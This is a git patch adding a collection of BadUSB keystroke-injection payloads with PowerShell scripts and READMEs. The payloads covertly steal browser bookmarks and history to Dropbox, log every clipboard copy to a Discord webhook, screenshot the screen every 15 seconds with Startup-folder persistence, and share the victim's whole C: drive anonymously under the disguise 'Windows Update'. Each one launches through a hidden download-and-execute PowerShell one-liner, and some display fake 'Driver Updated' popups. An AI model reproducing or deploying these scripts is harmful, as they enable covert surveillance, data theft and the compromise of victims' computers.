From d24014a60c2207211d6e6c4848371a9fee36f408 Mon Sep 17 00:00:00 2001 From: atomic <75549184+atomiczsec@users.noreply.github.com> Date: Sat, 17 Sep 2022 16:03:33 -0400 Subject: [PATCH] Add files via upload --- BadUSB/Bookmark-Hog/BH.ps1 | 63 ++++++++++++++++ BadUSB/Bookmark-Hog/README.md | 111 ++++++++++++++++++++++++++++ BadUSB/Bookmark-Hog/payload.txt | 16 ++++ BadUSB/Copy-And-Waste/I.bat | 3 + BadUSB/Copy-And-Waste/README.md | 119 ++++++++++++++++++++++++++++++ BadUSB/Copy-And-Waste/c.ps1 | 36 +++++++++ BadUSB/Copy-And-Waste/payload.txt | 17 +++++ BadUSB/Copy-And-Waste/placeholder | 1 + BadUSB/History-Pig/HP.ps1 | 63 ++++++++++++++++ BadUSB/History-Pig/README.md | 109 +++++++++++++++++++++++++++ BadUSB/History-Pig/payload.txt | 16 ++++ BadUSB/Pwn-Drive/README.md | 107 +++++++++++++++++++++++++++ BadUSB/Pwn-Drive/c.ps1 | 14 ++++ BadUSB/Pwn-Drive/payload.txt | 16 ++++ BadUSB/Screen-Shock/I.bat | 3 + BadUSB/Screen-Shock/README.md | 117 +++++++++++++++++++++++++++++ BadUSB/Screen-Shock/c.ps1 | 45 +++++++++++ BadUSB/Screen-Shock/payload.txt | 17 +++++ BadUSB/Screen-Shock/placeholder | 1 + BadUSB/Water-UnMark/README.md | 103 ++++++++++++++++++++++++++ BadUSB/Water-UnMark/payload.txt | 17 +++++ BadUSB/Water-UnMark/placeholder | 1 + 22 files changed, 995 insertions(+) create mode 100644 BadUSB/Bookmark-Hog/BH.ps1 create mode 100644 BadUSB/Bookmark-Hog/README.md create mode 100644 BadUSB/Bookmark-Hog/payload.txt create mode 100644 BadUSB/Copy-And-Waste/I.bat create mode 100644 BadUSB/Copy-And-Waste/README.md create mode 100644 BadUSB/Copy-And-Waste/c.ps1 create mode 100644 BadUSB/Copy-And-Waste/payload.txt create mode 100644 BadUSB/Copy-And-Waste/placeholder create mode 100644 BadUSB/History-Pig/HP.ps1 create mode 100644 BadUSB/History-Pig/README.md create mode 100644 BadUSB/History-Pig/payload.txt create mode 100644 BadUSB/Pwn-Drive/README.md create mode 100644 BadUSB/Pwn-Drive/c.ps1 create mode 100644 BadUSB/Pwn-Drive/payload.txt create mode 100644 BadUSB/Screen-Shock/I.bat create mode 100644 BadUSB/Screen-Shock/README.md create mode 100644 BadUSB/Screen-Shock/c.ps1 create mode 100644 BadUSB/Screen-Shock/payload.txt create mode 100644 BadUSB/Screen-Shock/placeholder create mode 100644 BadUSB/Water-UnMark/README.md create mode 100644 BadUSB/Water-UnMark/payload.txt create mode 100644 BadUSB/Water-UnMark/placeholder diff --git a/BadUSB/Bookmark-Hog/BH.ps1 b/BadUSB/Bookmark-Hog/BH.ps1 new file mode 100644 index 00000000..5b8f1cdc --- /dev/null +++ b/BadUSB/Bookmark-Hog/BH.ps1 @@ -0,0 +1,63 @@ +#Bookmark-Hog + +# See if file is a thing +Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf + +#If the file does not exist, write to host. +if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) { + try { + Write-Host "The chrome bookmark file has not been found. " + } + catch { + throw $_.Exception.Message + } + } + # Copy Chrome Bookmarks to Bash Bunny + else { + $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_bookmarks.txt" + Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$env:tmp/$F1" + } + +# See if file is a thing +Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf + +#If the file does not exist, write to host. +if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) { + try { + Write-Host "The edge bookmark file has not been found. " + } + catch { + throw $_.Exception.Message + } +} + # Copy Chrome Bookmarks to Bash Bunny + else { + $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_bookmarks.txt" + Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$env:tmp/$F2" +} + +function DropBox-Upload { + + [CmdletBinding()] + param ( + + [Parameter (Mandatory = $True, ValueFromPipeline = $True)] + [Alias("f")] + [string]$SourceFilePath + ) + $DropBoxAccessToken = "YOUR ACCESS TOKEN" # Replace with your DropBox Access Token + $outputFile = Split-Path $SourceFilePath -leaf + $TargetFilePath="/$outputFile" + $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' + $authorization = "Bearer " + $DropBoxAccessToken + $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" + $headers.Add("Authorization", $authorization) + $headers.Add("Dropbox-API-Arg", $arg) + $headers.Add("Content-Type", 'application/octet-stream') + Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers + } + +DropBox-Upload -f "$env:tmp/$F1" +DropBox-Upload -f "$env:tmp/$F2" + +$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) diff --git a/BadUSB/Bookmark-Hog/README.md b/BadUSB/Bookmark-Hog/README.md new file mode 100644 index 00000000..8ebcf887 --- /dev/null +++ b/BadUSB/Bookmark-Hog/README.md @@ -0,0 +1,111 @@ + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Bookmark-Hog + +A payload to exfiltrate bookmarks of the 2 most popular browsers + +## Description + +This payload will enumerate through the browser directories, looking for the file that stores the bookmark history + +These files will be saved to the temp directory + +Finally dropbox will be used to exfiltrate the files to cloud storage + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/BadUSB/Bookmark-Hog/payload.txt b/BadUSB/Bookmark-Hog/payload.txt new file mode 100644 index 00000000..17ce970b --- /dev/null +++ b/BadUSB/Bookmark-Hog/payload.txt @@ -0,0 +1,16 @@ +REM Title: Bookmark-Hog + +REM Author: atomiczsec + +REM Description: This payload is meant to exfiltrate bookmarks to the rubber ducky + +REM Target: Windows 10, 11 + +DELAY 2000 +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl +ENTER + +REM Remember to replace the link with your DropBox shared link for the intended file to download +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 diff --git a/BadUSB/Copy-And-Waste/I.bat b/BadUSB/Copy-And-Waste/I.bat new file mode 100644 index 00000000..665c9be9 --- /dev/null +++ b/BadUSB/Copy-And-Waste/I.bat @@ -0,0 +1,3 @@ +@echo off +powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}" +pause diff --git a/BadUSB/Copy-And-Waste/README.md b/BadUSB/Copy-And-Waste/README.md new file mode 100644 index 00000000..93c4db2b --- /dev/null +++ b/BadUSB/Copy-And-Waste/README.md @@ -0,0 +1,119 @@ + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Copy-And-Waste + +A payload to exfiltrate clipboard contents + +## Description + +This payload uses iwr to download 2 files +* I.bat +* c.ps1 + +**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup + +**c.ps1** will sit in AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click + +Then the contents will then be sent to the discord webhook for viewing pleasure + +For killing the script press both Ctrl buttons at the same time [It will resume at reboot] + + +## Getting Started + +### Dependencies + +* Pastebin or other file sharing service, Discord webhook or other webhook service +* Windows 10,11 +* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks + +

(back to top)

+ +### Executing program + +* Plug in your device +* Device will download both files and place them in proper directories to then run the script +``` +powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here: + +[atomiczsec](https://github.com/atomiczsec) & +[I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/BadUSB/Copy-And-Waste/c.ps1 b/BadUSB/Copy-And-Waste/c.ps1 new file mode 100644 index 00000000..0215ae3b --- /dev/null +++ b/BadUSB/Copy-And-Waste/c.ps1 @@ -0,0 +1,36 @@ +Add-Type -AssemblyName WindowsBase +Add-Type -AssemblyName PresentationCore + +function dischat { + + [CmdletBinding()] + param ( + [Parameter (Position=0,Mandatory = $True)] + [string]$con + ) + + $hookUrl = 'YOUR DISCORD WEBHOOK' + +$Body = @{ + 'username' = $env:username + 'content' = $con +} + + +Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body + +} + + +dischat (get-clipboard) + +while (1){ + $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl') + $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl) + $cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c) + $xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x) + + if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)} + elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit} + else {continue} +} \ No newline at end of file diff --git a/BadUSB/Copy-And-Waste/payload.txt b/BadUSB/Copy-And-Waste/payload.txt new file mode 100644 index 00000000..a44aae6f --- /dev/null +++ b/BadUSB/Copy-And-Waste/payload.txt @@ -0,0 +1,17 @@ +REM Title: Copy-And-Waste + +REM Author: atomiczsec & I am Jakoby + +REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook + +REM Target: Windows 10, 11 + +DELAY 2000 +GUI +DELAY +STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" +ENTER + +REM Remember to replace the link with your pastebin shared link for the intended files to download +REM Also remember to put in your discord webhook in c.ps1 +REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH \ No newline at end of file diff --git a/BadUSB/Copy-And-Waste/placeholder b/BadUSB/Copy-And-Waste/placeholder new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/BadUSB/Copy-And-Waste/placeholder @@ -0,0 +1 @@ + diff --git a/BadUSB/History-Pig/HP.ps1 b/BadUSB/History-Pig/HP.ps1 new file mode 100644 index 00000000..42443b43 --- /dev/null +++ b/BadUSB/History-Pig/HP.ps1 @@ -0,0 +1,63 @@ +#History-Pig + +# See if file is a thing +Test-Path -Path "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" -PathType Leaf + +#If the file does not exist, write to host. +if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -PathType Leaf)) { + try { + Write-Host "The Chrome History file has not been found. " + } + catch { + throw $_.Exception.Message + } + } + # Copy Chrome History to Temp Directory to get sent to Dropbox + else { + $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_history" + Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -Destination "$env:tmp/$F1" + } + +# See if file is a thing +Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf + +#If the file does not exist, write to host. +if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf)) { + try { + Write-Host "The Edge History file has not been found. " + } + catch { + throw $_.Exception.Message + } +} + # Copy Edge History to Temp Directory to get sent to Dropbox + else { + $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_history" + Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -Destination "$env:tmp/$F2" +} + +function DropBox-Upload { + + [CmdletBinding()] + param ( + + [Parameter (Mandatory = $True, ValueFromPipeline = $True)] + [Alias("f")] + [string]$SourceFilePath + ) + $DropBoxAccessToken = "ADD-YOUR-DROPBOX-TOKEN-HERE" # Replace with your DropBox Access Token + $outputFile = Split-Path $SourceFilePath -leaf + $TargetFilePath="/$outputFile" + $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' + $authorization = "Bearer " + $DropBoxAccessToken + $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" + $headers.Add("Authorization", $authorization) + $headers.Add("Dropbox-API-Arg", $arg) + $headers.Add("Content-Type", 'application/octet-stream') + Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers + } + +DropBox-Upload -f "$env:tmp/$F1" +DropBox-Upload -f "$env:tmp/$F2" + +$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) diff --git a/BadUSB/History-Pig/README.md b/BadUSB/History-Pig/README.md new file mode 100644 index 00000000..b8552e81 --- /dev/null +++ b/BadUSB/History-Pig/README.md @@ -0,0 +1,109 @@ +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# History-Pig + +A payload to exfiltrate the history of the 2 most popular browsers + +## Description + +This payload will enumerate through the browser directories, looking for the file that stores the history + +These files will be saved to the temp directory + +Finally dropbox will be used to exfiltrate the files to cloud storage + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/BadUSB/History-Pig/payload.txt b/BadUSB/History-Pig/payload.txt new file mode 100644 index 00000000..91224b20 --- /dev/null +++ b/BadUSB/History-Pig/payload.txt @@ -0,0 +1,16 @@ +REM Title: History-Pig + +REM Author: atomiczsec + +REM Description: This payload is meant to exfiltrate browsers history to a dropbox + +REM Target: Windows 10, 11 + +DELAY 2000 +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl +ENTER + +REM Remember to replace the link with your DropBox shared link for the intended file to download +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 diff --git a/BadUSB/Pwn-Drive/README.md b/BadUSB/Pwn-Drive/README.md new file mode 100644 index 00000000..c3211bb1 --- /dev/null +++ b/BadUSB/Pwn-Drive/README.md @@ -0,0 +1,107 @@ + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Pwn-Drive + +A payload to share the victims "C:" drive to the network. + +## Description + +This payload will share the entire victims "C:" drive to the entire network for further exploitation. + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/BadUSB/Pwn-Drive/c.ps1 b/BadUSB/Pwn-Drive/c.ps1 new file mode 100644 index 00000000..798b9eea --- /dev/null +++ b/BadUSB/Pwn-Drive/c.ps1 @@ -0,0 +1,14 @@ +#Pwn-Drive + +#Enable Network Discovery +netsh advfirewall firewall set rule group=”network discovery” new enable=yes + +#Enable File and Print +netsh firewall set service type=fileandprint mode=enable profile=all + +#Setting Registry Values for allowing access to drive without credentials +Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name everyoneincludesanonymous -Value 1 -Force +Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\" -Name restrictnullsessacces -Value 0 -Force + +#Sharing the Drive +New-SmbShare -Name "Windows Update" -Path "C:\" \ No newline at end of file diff --git a/BadUSB/Pwn-Drive/payload.txt b/BadUSB/Pwn-Drive/payload.txt new file mode 100644 index 00000000..a5dd5245 --- /dev/null +++ b/BadUSB/Pwn-Drive/payload.txt @@ -0,0 +1,16 @@ +REM Title: Pwn-Drive + +REM Author: atomiczsec + +REM Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation. + +REM Target: Windows 10 + +DELAY 2000 +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl +ENTER + +REM Remember to replace the link with your DropBox shared link for the intended file to download +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 diff --git a/BadUSB/Screen-Shock/I.bat b/BadUSB/Screen-Shock/I.bat new file mode 100644 index 00000000..665c9be9 --- /dev/null +++ b/BadUSB/Screen-Shock/I.bat @@ -0,0 +1,3 @@ +@echo off +powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}" +pause diff --git a/BadUSB/Screen-Shock/README.md b/BadUSB/Screen-Shock/README.md new file mode 100644 index 00000000..a53c03fd --- /dev/null +++ b/BadUSB/Screen-Shock/README.md @@ -0,0 +1,117 @@ + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Screen-Shock + +This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file) + +## Description + +This payload uses iwr to download 2 files +* I.bat +* c.ps1 + +**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup + +**c.ps1** will sit in AppData\Roaming folder, taking a screenshot of all monitors every 15 seconds + +Then the contents will then be sent to the DropBox for viewing pleasure + + + +## Getting Started + +### Dependencies + +* Pastebin or other file sharing service, Dropbox +* Windows 10 +* [Here](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/DropBox-Upload.md) is a tutorial on how to use DropBox-Upload + +

(back to top)

+ +### Executing program + +* Plug in your device +* Device will download both files and place them in proper directories to then run the script +``` +powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here: + +[atomiczsec](https://github.com/atomiczsec) + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/BadUSB/Screen-Shock/c.ps1 b/BadUSB/Screen-Shock/c.ps1 new file mode 100644 index 00000000..ef43687a --- /dev/null +++ b/BadUSB/Screen-Shock/c.ps1 @@ -0,0 +1,45 @@ +function DropBox-Upload { + +[CmdletBinding()] +param ( + +[Parameter (Mandatory = $True, ValueFromPipeline = $True)] +[Alias("f")] +[string]$SourceFilePath +) +$DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token +$outputFile = Split-Path $SourceFilePath -leaf +$TargetFilePath="/$outputFile" +$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' +$authorization = "Bearer " + $DropBoxAccessToken +$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" +$headers.Add("Authorization", $authorization) +$headers.Add("Dropbox-API-Arg", $arg) +$headers.Add("Content-Type", 'application/octet-stream') +Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers +} + +while(1){ + + Add-Type -AssemblyName System.Windows.Forms,System.Drawing + + $screens = [Windows.Forms.Screen]::AllScreens + + $top = ($screens.Bounds.Top | Measure-Object -Minimum).Minimum + $left = ($screens.Bounds.Left | Measure-Object -Minimum).Minimum + $width = ($screens.Bounds.Right | Measure-Object -Maximum).Maximum + $height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum + + $bounds = [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height) + $bmp = New-Object -TypeName System.Drawing.Bitmap -ArgumentList ([int]$bounds.width), ([int]$bounds.height) + $graphics = [Drawing.Graphics]::FromImage($bmp) + + $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) + + $bmp.Save("$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png") + $graphics.Dispose() + $bmp.Dispose() + + start-sleep -Seconds 15 + "$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png" | DropBox-Upload +} \ No newline at end of file diff --git a/BadUSB/Screen-Shock/payload.txt b/BadUSB/Screen-Shock/payload.txt new file mode 100644 index 00000000..d7513965 --- /dev/null +++ b/BadUSB/Screen-Shock/payload.txt @@ -0,0 +1,17 @@ +REM Title: Screen-Shock + +REM Author: atomiczsec + +REM Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file) + +REM Target: Windows 10 + +DELAY 2000 +GUI +DELAY +STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" +ENTER + +REM Remember to replace the link with your pastebin shared link for the intended files to download +REM Also remember to put in your discord webhook in c.ps1 +REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH \ No newline at end of file diff --git a/BadUSB/Screen-Shock/placeholder b/BadUSB/Screen-Shock/placeholder new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/BadUSB/Screen-Shock/placeholder @@ -0,0 +1 @@ + diff --git a/BadUSB/Water-UnMark/README.md b/BadUSB/Water-UnMark/README.md new file mode 100644 index 00000000..c1b36160 --- /dev/null +++ b/BadUSB/Water-UnMark/README.md @@ -0,0 +1,103 @@ + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Water-UnMark + +A payload to get rid of the ugly windows activation watermark. + +## Description +This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!! + +## Getting Started + +### Dependencies + +* Unactivated Windows 10 + +

(back to top)

+ +### Executing program + +* Plug in your device +``` +Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here: + +[atomiczsec](https://github.com/atomiczsec) + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/BadUSB/Water-UnMark/payload.txt b/BadUSB/Water-UnMark/payload.txt new file mode 100644 index 00000000..e57c6d7b --- /dev/null +++ b/BadUSB/Water-UnMark/payload.txt @@ -0,0 +1,17 @@ +REM Title: Water-UnMark +REM Author: atomiczsec +REM Target OS: Windows 10 +REM Description: This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!! + +DELAY 2000 +GUI r +DELAY 100 +STRING powershell Start-Process powershell -verb runAs +DELAY 1000 +ALT Y +DELAY 1000 +STRING Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force +ENTER +DELAY 100 +STRING Restart-Computer -Force +ENTER diff --git a/BadUSB/Water-UnMark/placeholder b/BadUSB/Water-UnMark/placeholder new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/BadUSB/Water-UnMark/placeholder @@ -0,0 +1 @@ +